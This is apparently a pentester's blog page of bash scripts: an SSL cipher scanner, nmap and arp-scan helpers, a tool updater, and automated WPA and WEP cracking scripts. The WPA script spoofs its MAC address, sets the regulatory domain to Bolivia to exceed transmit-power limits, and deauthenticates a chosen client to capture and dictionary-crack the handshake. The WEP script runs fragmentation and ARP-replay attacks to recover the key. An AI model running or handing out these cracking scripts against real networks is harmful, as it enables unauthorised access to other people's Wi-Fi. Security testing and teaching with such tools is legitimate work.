SSL scan against targets.txt
I have written an automated SSL scanning script (matts-ssl.sh). It will scan a list of targets given in targets.txt against a specific port and then report weak ciphers or SSLv2 usage. Let me know if you have any improvements.
#!/bin/bash
#
# matts-ssl.sh v1.2
# Created by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.2"
#
# This tool requires sslscan to be installed
#
# ChangeLog....
# Version 1.2 - Changed output to ssl_all.txt
# Version 1.1 - Added recommended ports and not connect removal
# Version 1.0 - First Release
#
#################################################################
# CHECKING FOR ROOT
#################################################################
# Check the effective UID; this also works under sudo or when USER is unset
if [ "$(id -u)" -ne 0 ]
then
echo "MESSAGE: matts-ssl.sh ${VERSION}"
echo "MESSAGE: ERROR: Please run as root!"
echo "MESSAGE:"
exit 1
fi
#################################################################
# CREATING DIRECTORY
#################################################################
STARTDIR=`pwd`
# -p so that a second run does not fail when ./ssl already exists
mkdir -p "${STARTDIR}/ssl"
cd "${STARTDIR}/ssl" || exit 1
#################################################################
# CHECKING TO SEE IF IP OR TARGETS.TXT GIVEN
#################################################################
if [ -z "${1}" ]
then
echo "MESSAGE:"
echo "MESSAGE: Usage: `basename ${0}` [ip_address] [port]"
echo "MESSAGE: # `basename ${0}` 127.0.0.1 443"
echo "MESSAGE: # `basename ${0}` targets.txt 443"
echo "MESSAGE: if port is not given i will presume 443"
if [ -f ../../targets.txt ]
then
echo "MESSAGE:"
echo "MESSAGE: You should consider scanning the following ports:"
cat ../*.tcp.txt | grep "ssl" | sort | uniq
echo "MESSAGE: END OF PORT LIST"
echo "MESSAGE:"
fi
exit 1
fi
# Quoted so the test does not error out when the port argument is omitted
if [ "${1}" = "targets.txt" ] || [ "${2}" = "targets" ]
then
TARGETIP="0"
echo "MESSAGE: performing sslscan against targets.txt"
#################################################################
# CHECKING IF targets.txt file is in parent directory
#################################################################
if [ -f ../../targets.txt ]
then
echo "MESSAGE: targets.txt file located"
echo "MESSAGE: Identified hosts from targets.txt"
else
echo "MESSAGE: please create a targets.txt file containing the hosts in the parent directory"
exit 1
fi
else
TARGETIP="`echo "${1}" | tr -cd '[:graph:]' | tr -d '[:alpha:]'`"
echo "MESSAGE: performing sslscan against ${TARGETIP}"
fi
#################################################################
# CHECKING TO SEE IF PORT GIVEN
#################################################################
if [ -z "${2}" ]
then
TARGETPORT="443"
echo "MESSAGE: no port given so attempting 443"
else
TARGETPORT="`echo "${2}" | tr -cd '[:digit:]' | cut -c 1-5`"
echo "MESSAGE: targeting port ${TARGETPORT}"
fi
#################################################################
# STARTING SSLSCAN
#################################################################
case ${TARGETIP} in
0)
for i in `cat ../../targets.txt`
do
echo "MESSAGE: now sslscanning ${i} on port ${TARGETPORT}"
sslscan --no-failed "${i}:${TARGETPORT}" > "${i}_${TARGETPORT}_ssl.txt"
done
;;
*)
echo "MESSAGE: now sslscanning ${TARGETIP} on port ${TARGETPORT}"
sslscan --no-failed "${TARGETIP}:${TARGETPORT}" > "${TARGETIP}_${TARGETPORT}_ssl.txt"
;;
esac
#################################################################
# DISPLAYING NICE OUTPUT OF RESULTS WITH HIGHLIGHTING
#################################################################
echo "MESSAGE: Scans finished"
read -p "MESSAGE: Press enter to see the results"
cat *_ssl.txt | grep "Testing\ SSL\|Accepted\|ERROR" > ssl__all.txt
grep -E --color=always '.*(SSLv2| 40| 56).*|' ssl__all.txt | grep -v "ERROR" | less -R
grep -E --color=always '.*(SSLv2| 40| 56).*|' ssl__all.txt | grep -v "ERROR" > ../SSL_results.txt
cd "${STARTDIR}/.."
# The results were written to ../SSL_results.txt relative to ./ssl, i.e. into ${STARTDIR}
echo "MESSAGE: Output saved to ${STARTDIR}/SSL_results.txt"
exit 0
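The final grep highlights any line that contains the strings " 40" or " 56", so a port number such as 5601 in a "Testing SSL server" line is highlighted as well. As an added example (not part of matts-ssl.sh), the filter below reads the same collated output field by field and generalises the check to a minimum key length. It assumes sslscan 1.8-style "Accepted <protocol> <bits> bits <cipher>" lines; the function names, the 128-bit default and the sample data are constructed for illustration.

```shell
#!/bin/bash
# Added example, not part of matts-ssl.sh.
# Assumed input (sslscan 1.8-style text, as collated into ssl__all.txt):
#   Testing SSL server <host> on port <port>
#       Accepted  <protocol>  <bits> bits  <cipher>

# weak_ciphers FILE [MIN_BITS]
# Prints "host:port protocol bits cipher reason" for each accepted cipher that
# is offered over SSLv2 or has a key shorter than MIN_BITS (default 128).
# FILE may be "-" to read standard input.
weak_ciphers() {
    awk -v min="${2:-128}" '
        $1 == "Testing" && $2 == "SSL" {
            # Header line: remember the target for the Accepted lines below it.
            for (i = 1; i < NF; i++) {
                if ($i == "server") host = $(i + 1)
                if ($i == "port")   port = $(i + 1)
            }
            next
        }
        $1 == "Accepted" && $4 == "bits" {
            reason = ""
            if ($2 == "SSLv2") reason = "SSLv2"
            if ($3 + 0 < min)  reason = (reason == "" ? "" : reason ",") "short-key"
            if (reason != "")  print host ":" port, $2, $3, $5, reason
        }
    ' "$1"
}

# Constructed sample input (documentation addresses, not real scan results).
constructed_sample() {
    cat <<'EOF'
Testing SSL server 192.0.2.10 on port 443
    Accepted  SSLv2  128 bits  RC4-MD5
    Accepted  SSLv3  256 bits  AES256-SHA
    Accepted  TLSv1  40 bits   EXP-RC4-MD5
    Accepted  TLSv1  56 bits   DES-CBC-SHA
    Accepted  TLSv1  128 bits  AES128-SHA
Testing SSL server 192.0.2.40 on port 5601
    Accepted  TLSv1  256 bits  AES256-SHA
ERROR: Could not open a connection to host 192.0.2.12 on port 443.
EOF
}

# Demonstration: only the SSLv2, 40-bit and 56-bit entries are reported.
constructed_sample | weak_ciphers -
```

Against the script's own output the call would be `weak_ciphers ssl/ssl__all.txt`, with an optional second argument to change the minimum key length.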
GnackTrack
For those who, like me, don't like BT4 with the KDE interface, I have decided to build my own pentest distro based on GNOME. I'll slowly be adding the functionality required to bring it on par with BT4. Please click here (GnackTrack.co.uk) to go to the dedicated GnackTrack website.
Automated WPA cracking script!!!!
I have written an automated WPA cracking script (matts-wpacrack.sh). Let me know if you have any improvements.
#!/bin/bash
# wpacrack.sh v.1.1
# Created by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
#
VERSION="1.1"
# This tool requires aircrack-ng tools to be installed and run as root
#
# ChangeLog....
# Version 1.1 - Randomises MAC Address on start
# Version 1.0 - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
echo "MESSAGE:"
echo "MESSAGE: ERROR: Please run as root!"
echo "MESSAGE:"
exit 1
fi
#################################################################
# CHECKING TO SEE IF INTERFACE IS PROVIDED
#################################################################
if [ -z ${1} ]
then
echo "MESSAGE: Version number ${VERSION}"
echo "MESSAGE: Usage: `basename ${0}` [interface] [BSSID] [channel] [client]"
echo "MESSAGE: Example #`basename ${0}` wlan0 (everything else is optional)"
exit 1
else
INTERFACE="`echo "${1}" | cut -c 1-6`"
fi
#################################################################
# PUT WIFI IN HIGHPOWER AND MONITOR MODE AND RANDOM MAC
#################################################################
macchanger -r ${INTERFACE}
iw reg set BO
sleep 3
iwconfig ${INTERFACE} txpower 30
POWER=`iwlist ${INTERFACE} txpower | grep Current | tr -s ' ' | cut -d '(' -f2 | sed -e s/')'//`
echo "MESSAGE: ${INTERFACE} power set to ${POWER}"
echo "MESSAGE: Putting ${INTERFACE} in monitor mode"
airmon-ng start ${INTERFACE}
#################################################################
# GET INTERFACE MAC ADDRESS
#################################################################
MACADDRESS=`ifconfig ${INTERFACE} | grep ${INTERFACE} | tr -s ' ' | cut -d ' ' -f5 | cut -c 1-17`
#################################################################
# CHECK IF BSSID,CHANNEL & TARGETNAME WERE PROVIDED
#################################################################
if [ -z ${2} ] || [ -z ${3} ]; then
#################################################################
# SHOW VISIBLE WPA NETWORKS
#################################################################
echo "MESSAGE: Will now display all visible WPA networks"
echo "MESSAGE: Once you have identified the network you wish to target press Ctrl-C to exit"
read -p "MESSAGE: Press enter to view networks"
airodump-ng --encrypt WPA ${INTERFACE} # mon0
#################################################################
# USER INPUT DETAILS FROM AIRODUMP
#################################################################
while true
do
echo -n "MESSAGE: Please enter the target BSSID here: "
read -e BSSID
echo -n "MESSAGE: Please enter the target channel here: "
read -e CHANNEL
echo "MESSAGE: Target BSSID : ${BSSID}"
echo "MESSAGE: Target Channel : ${CHANNEL}"
echo "MESSAGE: Interface MAC Address : ${MACADDRESS}"
echo -n "MESSAGE: Is this information correct? (y or n): "
read -e CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
break ;;
*) echo "MESSAGE: Please re-enter information" ;;
esac
done
fi
#################################################################
# CHECK IF THE USER NEEDS TO FIND A CLIENT
#################################################################
#if [ -z {4} ]; then
#################################################################
# SHOW AP CLIENTS
#################################################################
echo "MESSAGE: Will now display all visible clients for ${BSSID}"
echo "MESSAGE: Once you have identified the client you wish to target press Ctrl-C to exit"
read -p "MESSAGE: Press enter to view networks"
airodump-ng -c ${CHANNEL} --bssid ${BSSID} ${INTERFACE}
while true
do
echo -n "MESSAGE: Please enter the target CLIENT here: "
read -e CLIENT
echo "MESSAGE: Target Client : ${CLIENT}"
echo -n "MESSAGE: Is this information correct? (y or n): "
read -e CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
break ;;
*) echo "MESSAGE: Please re-enter information" ;;
esac
done
#fi
#################################################################
# START DEAUTH TO CAPTURE WPA HANDSHAKE
#################################################################
echo "MESSAGE: Starting De-auth"
echo "MESSAGE: Once hand shake has been captured press Ctrl-C to exit"
read -p "MESSAGE: Press enter to attempt handshake capture"
xterm -e "sleep 1 && aireplay-ng -0 20 -a ${BSSID} -c ${CLIENT} ${INTERFACE}" &
airodump-ng -c ${CHANNEL} --bssid ${BSSID} -w psk ${INTERFACE}
#################################################################
# ATTEMPTING TO CRACK
#################################################################
aircrack-ng -w wpa.txt -b ${BSSID} psk*.cap -l key.txt
#################################################################
# OUTPUT BSSID AND KEY
#################################################################
KEY=`cat key.txt`
echo "MESSAGE: Target BSSID : ${BSSID}"
echo "MESSAGE: Target Key : ${KEY}"
#################################################################
# DELETE FILES CREATED DURING WPA CRACKING
#################################################################
airmon-ng stop mon0
rm psk* key.txt
exit 0
If you need a dictionary file you can use this one (wpa.txt).
Automated WEP cracking script!!!!
I have written an automated WEP cracking script (matts-wepcrack.sh). Let me know if you have any improvements.
#!/bin/bash
# wepcrack.sh v1.3
# Created by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.3"
#
# This tool requires aircrack-ng tools to be installed and run as root
#
# ChangeLog....
# Version 1.3 - Randomises interface MAC address
# Version 1.2 - Set txpower of card to 1000mw :-)
# Version 1.1 - Display key and BSSID at end of crack
# Version 1.0 - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
echo "MESSAGE:"
echo "MESSAGE: ERROR: Please run as root!"
echo "MESSAGE:"
exit 1
fi
#################################################################
# CHECKING TO SEE IF INTERFACE IS PROVIDED
#################################################################
if [ -z ${1} ]
then
echo "MESSAGE: Version number ${VERSION}"
echo "MESSAGE: Usage: `basename ${0}` [interface] [BSSID] [channel]"
echo "MESSAGE: Example #`basename ${0}` wlan0 (everything else is optional)"
exit 1
else
INTERFACE="`echo "${1}" | cut -c 1-6`"
fi
#################################################################
# PUT WIFI IN HIGHPOWER AND MONITOR MODE AND CHANGE MAC
#################################################################
#macchanger -r ${INTERFACE}
iw reg set BO
iwconfig ${INTERFACE} txpower 30
POWER=`iwlist ${INTERFACE} txpower | grep Current | tr -s ' ' | cut -d '(' -f2 | sed -e s/')'//`
echo "MESSAGE: ${INTERFACE} power set to ${POWER}"
echo "MESSAGE: Putting ${INTERFACE} in monitor mode"
airmon-ng start ${INTERFACE}
#################################################################
# GET INTERFACE MAC ADDRESS
#################################################################
MACADDRESS=`ifconfig ${INTERFACE} | grep ${INTERFACE} | tr -s ' ' | cut -d ' ' -f5 | cut -c 1-17`
#################################################################
# CHECK IF BSSID,CHANNEL & TARGETNAME WERE PROVIDED
#################################################################
if [ -z ${2} ] || [ -z ${3} ] ; then
#################################################################
# SHOW VISIBLE WEP NETWORKS
#################################################################
echo "MESSAGE: Will now display all visible WEP networks"
echo "MESSAGE: Once you have identified the network you wish to target press Ctrl-C to exit"
read -p "MESSAGE: Press enter to view networks"
airodump-ng --encrypt WEP ${INTERFACE} # mon0
#################################################################
# USER INPUT DETAILS FROM AIRODUMP
#################################################################
while true
do
echo -n "MESSAGE: Please enter the target BSSID here: "
read -e BSSID
echo -n "MESSAGE: Please enter the target channel here: "
read -e CHANNEL
echo "MESSAGE: Target BSSID : ${BSSID}"
echo "MESSAGE: Target Channel : ${CHANNEL}"
echo "MESSAGE: Interface MAC Address : ${MACADDRESS}"
echo -n "MESSAGE: Is this information correct? (y or n): "
read -e CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
break ;;
*) echo "MESSAGE: Please re-enter information"
esac
done
fi
#################################################################
# START AIRODUMP IN XTERM WINDOW
#################################################################
echo "MESSAGE: Starting packet capture - Ctrl-c to end it"
xterm -e "airodump-ng -c ${CHANNEL} --bssid ${BSSID} --ivs -w capture ${INTERFACE}" & AIRODUMPPID=$!
sleep 2
#################################################################
# ASSOCIATE WITH AP & THEN PERFORM FRAGMENTATION ATTACK
#################################################################
aireplay-ng -1 0 -a ${BSSID} -h ${MACADDRESS} ${INTERFACE}
aireplay-ng -5 -b ${BSSID} -h ${MACADDRESS} ${INTERFACE}
packetforge-ng -0 -a ${BSSID} -h ${MACADDRESS} -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet ${INTERFACE}
xterm -e "aireplay-ng -2 -r arp-packet ${INTERFACE}" & AIREPLAYPID=$!
#################################################################
# ATTEMPTING TO CRACK
#################################################################
#while true
#do
aircrack-ng -n 128 -b ${BSSID} *.ivs -l key.txt
# echo -n "MESSAGE: Did you get the key?: (y or no)"
# read -e CONFIRM
# case $CONFIRM in
# y|Y|YES|yes|Yes)
# break ;;
# *) echo "MESSAGE: Will attempt to crack again..." && sleep 3
# esac
#done
#################################################################
# OUTPUT BSSID AND KEY
#################################################################
KEY=`cat key.txt`
echo "MESSAGE: Target BSSID : ${BSSID}"
echo "MESSAGE: Target Key : ${KEY}"
#################################################################
# DELETE FILES CREATED DURING WEP CRACKING
#################################################################
kill ${AIRODUMPPID}
kill ${AIREPLAYPID}
airmon-ng stop mon0
rm *.ivs *.cap *.xor key.txt
exit 0
Lazy update script for BT4
I have written a little script (matts-update.sh) to update various tools on BT4.
#!/bin/bash
#
# matts-update.sh v1.1
# Created by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.1"
#
# This tool requires to be run as root
#
# ChangeLog....
# Version 1.1 - added version output
# Version 1.0 - First Release
#
echo "MESSAGE: matts-update.sh ${VERSION}"
echo "MESSAGE:"
startdir=`pwd`
echo ........................................
echo Now updating Metasploit framework 3
cd /pentest/exploits/framework3/
svn update
echo Metasploit framework 3 now updated
echo ........................................
echo Now updating nessus
/opt/nessus/sbin/nessus-update-plugins
echo Nessus updating in background
echo ........................................
##echo Now updating exploit db
##cd /pentest/exploits/exploitdb
##svn up
##echo exploitDB update complete
##echo ........................................
echo Now updating OpenVas
openvas-nvt-sync
echo OpenVas update complete
echo ........................................
echo Now updating MetaSploit2
cd /pentest/exploits/framework2/
svn update
echo MetaSploit update complete
echo ........................................
#### Stuff below added 22/02/10
echo Now updating Social Engineering Toolkit SET
cd /pentest/exploits/SET/
./update_set
echo SET update complete
echo ........................................
echo Now updating Fast-Track
cd /pentest/exploits/fasttrack/
./fast-track.py -c 1 1
echo Fast-Track update complete
echo ........................................
echo Now updating Nikto
cd /pentest/scanners/nikto
./nikto.pl -update
echo Nikto update complete
echo ........................................
echo Now updating SQLMap
cd /pentest/database/sqlmap
./sqlmap.py --update
echo SQLMap update complete
echo ........................................
#### Go back to the directory you started in
cd "${startdir}"
Subnet Monitoring script
I have written a little script (matts-monitor.sh) to monitor for new devices on your subnet and then perform an action against each new device.
#!/bin/bash
#
# matts-monitor.sh v1.1
# Created by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.1"
#
# This tool requires arp-scan to be installed and to be run as root
#
# ChangeLog....
# Version 1.1 - Improved sort code
# - Added better GATEWAY detection
# - Allowed script escape by pressing enter
# - Collated argument checking into 1 if statement
# - Reports version number within usage
# Version 1.0 - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
# Check the effective UID; this also works under sudo or when USER is unset
if [ "$(id -u)" -ne 0 ]
then
echo "MESSAGE:"
echo "MESSAGE: ERROR: Please run as root!"
echo "MESSAGE:"
exit 1
fi
#################################################################
# CHECKING TO SEE IF INTERFACE AND INTERVAL PROVIDED
#################################################################
if [ -z "${1}" ] || [ -z "${2}" ]
then
echo "MESSAGE: Version number ${VERSION}"
echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
echo "MESSAGE: Example #`basename ${0}` eth0 60"
exit 1
else
INTERFACE="`echo "${1}" | cut -c 1-6`"
echo "MESSAGE: Monitoring ${1} for new devices"
INTERVAL="`echo "${2}" | tr -cd '[:digit:]' | cut -c 1-4`"
echo "MESSAGE: Scanning once every ${INTERVAL} seconds"
fi
#################################################################
# IDENTIFY IP, GATEWAY and SUBNET
#################################################################
IPADDR=`ifconfig ${INTERFACE} | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
SUBNET=`ifconfig ${INTERFACE} | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
GATEWAY=`route -n | grep ${INTERFACE} | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
echo "MESSAGE: interface=${INTERFACE} gateway=${GATEWAY} ip.addr=${IPADDR} subnet=${SUBNET}"
#################################################################
# PERFORMING FIRST SCAN TO CREATE WHITELIST
#################################################################
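# Sort the whitelist from the start so the first diff against the sorted SCAN.txt is meaningful
arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 | sort > WHITELIST.txt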
if [[ -s WHITELIST.txt ]] ; then
echo "MESSAGE: The following devices were found and will be excluded from this monitor."
cat WHITELIST.txt
else
echo "MESSAGE: No IPs found during arp-scan, are you sure your interface is up?"
exit 1
fi ;
#################################################################
# THIS IS THE MONITORING BIT
#################################################################
echo "MESSAGE: Press enter to exit the scanner"
while true; do
arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > SCAN.txt
sort SCAN.txt -o SCAN.txt
NEWIP=`diff -a SCAN.txt WHITELIST.txt | grep '^<' | sed -e 's/< //'`
# NEWIP may hold several addresses (one per line), so it must be quoted
if [ -n "${NEWIP}" ]; then
echo "MESSAGE: New IP detected!!! ${NEWIP}"
echo "${NEWIP}" >> WHITELIST.txt
#################################################################
# To run a command when new device found please enter it here
xterm -e "echo NUTS"
#################################################################
fi
sort WHITELIST.txt -o WHITELIST.txt
read -t ${INTERVAL} && break
done
#################################################################
# DELETE FILES CREATED DURING MONITORING
#################################################################
rm -rf SCAN.txt WHITELIST.txt
exit 0
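A set difference over two sorted address lists is another way to do the comparison in the monitoring loop, and it copes with several devices appearing in the same interval. The following is an added example, not part of matts-monitor.sh: it picks addresses out of arp-scan output by matching the first field rather than by deleting header and footer lines, then uses comm to list the new ones. The function names and the two sample scans are constructed for illustration, and the whitelist file is assumed to be sorted in the C locale.

```shell
#!/bin/bash
# Added example, not part of matts-monitor.sh.

# arp_scan_ips: read arp-scan output on stdin and print the unique IPv4
# addresses found in the first column, sorted in the C locale (as comm needs).
arp_scan_ips() {
    awk '$1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ { print $1 }' | LC_ALL=C sort -u
}

# check_scan WHITELIST_FILE: read one arp-scan run on stdin, print every
# address that is not yet whitelisted (one per line), then merge the new
# addresses into the whitelist so each device is reported only once.
check_scan() {
    local whitelist="$1" scan new
    scan=$(mktemp) || return 1
    arp_scan_ips > "$scan"
    # comm -23 keeps lines that appear only in the first (scan) file.
    new=$(LC_ALL=C comm -23 "$scan" "$whitelist")
    if [ -n "$new" ]; then
        printf '%s\n' "$new"
        LC_ALL=C sort -u -o "$whitelist" "$whitelist" "$scan"
    fi
    rm -f "$scan"
}

# Constructed arp-scan output: the baseline taken when monitoring starts.
baseline_output() {
    cat <<'EOF'
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan with 256 hosts
192.0.2.1    00:00:5e:00:53:01  (Unknown)
192.0.2.10   00:00:5e:00:53:0a  (Unknown)

2 packets received by filter, 0 packets dropped by kernel
EOF
}

# Constructed arp-scan output: a later run with two new devices, a duplicate
# reply and a different response order.
later_output() {
    cat <<'EOF'
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan with 256 hosts
192.0.2.57   00:00:5e:00:53:39  (Unknown)
192.0.2.1    00:00:5e:00:53:01  (Unknown)
192.0.2.23   00:00:5e:00:53:17  (Unknown)
192.0.2.1    00:00:5e:00:53:01  (Unknown) (DUP: 2)
192.0.2.10   00:00:5e:00:53:0a  (Unknown)

5 packets received by filter, 0 packets dropped by kernel
EOF
}

# Demonstration: build the whitelist, then report each new device separately.
wl=$(mktemp)
baseline_output | arp_scan_ips > "$wl"
later_output | check_scan "$wl" | while read -r ip; do
    echo "MESSAGE: New IP detected!!! ${ip}"
done
rm -f "$wl"
```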
Nmap 5.21 debian binary
Here is the 5.21 build of Nmap. Please click here (nmap_5.21-2_i386.deb) to download the debian binary
Ncat 5.21 debian binary
Here is the 5.21 build of Ncat. Please click here (ncat_5.21-2_i386.deb) to download the debian binary
BackTrack 4 Final
For those that are receiving poor speeds from the remote exploit servers here is the v4 Final build of BackTrack. Please click here (bt4-final.iso) to download the iso
Please note this server is in France so will be best suited to those situated in Europe.
NMAP script scanning devices in targets.txt
I have written a little script (matts-nmap.sh) to help speed up my penetration testing. It simply scans each IP/host inside the targets.txt file of your current directory and places the output in a folder named whatever you like. You can set it to scan x number of devices at a time; each will pop up in its own little xterm window.
#!/bin/bash
#
# matts-nmap.sh v1.7
# Created by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.7"
#
# This tool requires nmap to be installed and to be run as root
#
# ChangeLog....
# Version 1.7 - added output of version to help message
# Version 1.6 - fixed grepping of nmap output (nmap 5.20+ changed output text)
# Version 1.5 - checked for targets.txt file
# Version 1.4 - added count to stdout (x of y)
# Version 1.3 - added loads of comments and re-arranged if statements
# Version 1.2 - added ability to choose big/small scan
# Version 1.1 - added ability to choose directory on command line
# Version 1.0 - First Release
#
#################################################################
# CHECKING FOR ROOT
#################################################################
# Check the effective UID; this also works under sudo or when USER is unset
if [ "$(id -u)" -ne 0 ]
then
echo "MESSAGE: matts-nmap.sh ${VERSION}"
echo "MESSAGE: ERROR: Please run as root!"
echo "MESSAGE:"
exit 1
fi
#################################################################
# CHECKING TO SEE IF NUMBER OF THREADS GIVEN
#################################################################
if [ -z "${1}" ]
then
echo "MESSAGE: matts-nmap.sh ${VERSION}"
echo "MESSAGE: Usage: `basename ${0}` [threads max = 99] [big/small] [directory]"
echo "MESSAGE: # `basename ${0}` 5 small VLANxyz"
echo "MESSAGE: if scan size not given i will scan all ports"
echo "MESSAGE: if directory is not given then I will write to ./devices/"
echo "MESSAGE:"
exit 1
fi
THREADS="`echo "${1}" | tr -cd '[:digit:]' | cut -c 1-2`"
#################################################################
# CHECKING TO SEE IF SIZE OF SCAN GIVEN
#################################################################
# Quoted so the test does not error out when no scan size is given
if [ "${2}" = "big" ] || [ "${2}" = "small" ]
then
SIZETYPE="`echo "${2}" | tr -cd '[:alnum:]' | cut -c 1-5`"
echo "MESSAGE: performing a ${SIZETYPE} scan"
else
SIZETYPE="big"
echo "MESSAGE: no scan size given or its invalid so scan size will be big."
fi
#################################################################
# CHECKING TO SEE IF DIRECTORY IS GIVEN
#################################################################
if [ -z "${3}" ]
then
DIRECTORY="devices"
echo "MESSAGE: no dir given so outputting to ${DIRECTORY}"
else
DIRECTORY="`echo "${3}" | tr -cd '[:alnum:]'`"
echo "MESSAGE: output dir = ${DIRECTORY}"
fi
#################################################################
# CHECKING IF targets.txt file is in current directory
#################################################################
if [ -f ./targets.txt ]
then
echo "MESSAGE: targets.txt file located"
echo "MESSAGE: Identified hosts from targets.txt"
cat targets.txt
echo "MESSAGE: end of IPs/Hosts"
else
echo "MESSAGE: please create a targets.txt file containing the hosts"
exit 1
fi
#################################################################
# Number of targets
#################################################################
# Read from stdin so wc prints only the count, not "N targets.txt"
NUMBER=`wc -l < targets.txt`
COUNT=0
echo "MESSAGE: Found ${NUMBER} targets to scan"
#################################################################
# CREATING DIRECTORY
#################################################################
STARTDIR=`pwd`
mkdir "${STARTDIR}/${DIRECTORY}"
echo "MESSAGE: Starting Scan with ${THREADS} threads"
#################################################################
# STARTING LOOPS OF SCANS
#################################################################
for i in `cat targets.txt`
do
TARGET=${i}
((COUNT++))
echo "MESSAGE: now scanning ${TARGET} ${COUNT} of ${NUMBER}"
case ${SIZETYPE} in
small) xterm -e "nmap -e eth0 -sS -vv -d -A -P0 -n -r -oN ${DIRECTORY}/${TARGET}.small.tcp.txt ${TARGET}" & ;;
big) xterm -e "nmap -e eth0 -sS -vv -d -A -p1-65535 -P0 -n -r -oN ${DIRECTORY}/${TARGET}.big.tcp.txt ${TARGET}" & ;;
esac
xterm -e "nmap -e eth0 -sU -vv -d -P0 -n -r -oN ${DIRECTORY}/${TARGET}.udp.txt ${TARGET}" &
while [ `ps -Aef --cols 200 | grep ${DIRECTORY} | grep xterm | grep -v grep | wc -l` -ge ${THREADS} ]
do
sleep 2
done
done
#################################################################
# WAITING FOR ALL SCANS TO FINISH
#################################################################
while [ `ps -Aef --cols 200 | grep ${DIRECTORY} | grep xterm | grep -v grep | wc -l` -gt 0 ]
do
echo "MESSAGE: `ps -Aef --cols 200 | grep ${DIRECTORY} | grep xterm | grep -v grep | wc -l` processes still running"
sleep 10
done
echo "MESSAGE: Scanning Complete"
#################################################################
# DISPLAYING NICE OUTPUT OF RESULTS WITH HIGHLIGHTING
#################################################################
cd "${STARTDIR}/${DIRECTORY}"
cat *p.txt | grep "scan\ report\ for\|Interesting\|open\|---------------------------------------------" | grep -v "OSScan" > open_ports.txt
grep -E --color=always '.*(rdp|ssl|http|telnet|https|sslv2|mail|smtp|snmp).*|' open_ports.txt | less -R
cd "${STARTDIR}/.."
exit 0
HP DL320 Fan Speed
For those that have wife issues due to loud fan speeds you can install HP_ASM and HP_SMH. Please click here (HP_DL320_G2) to download the various versions.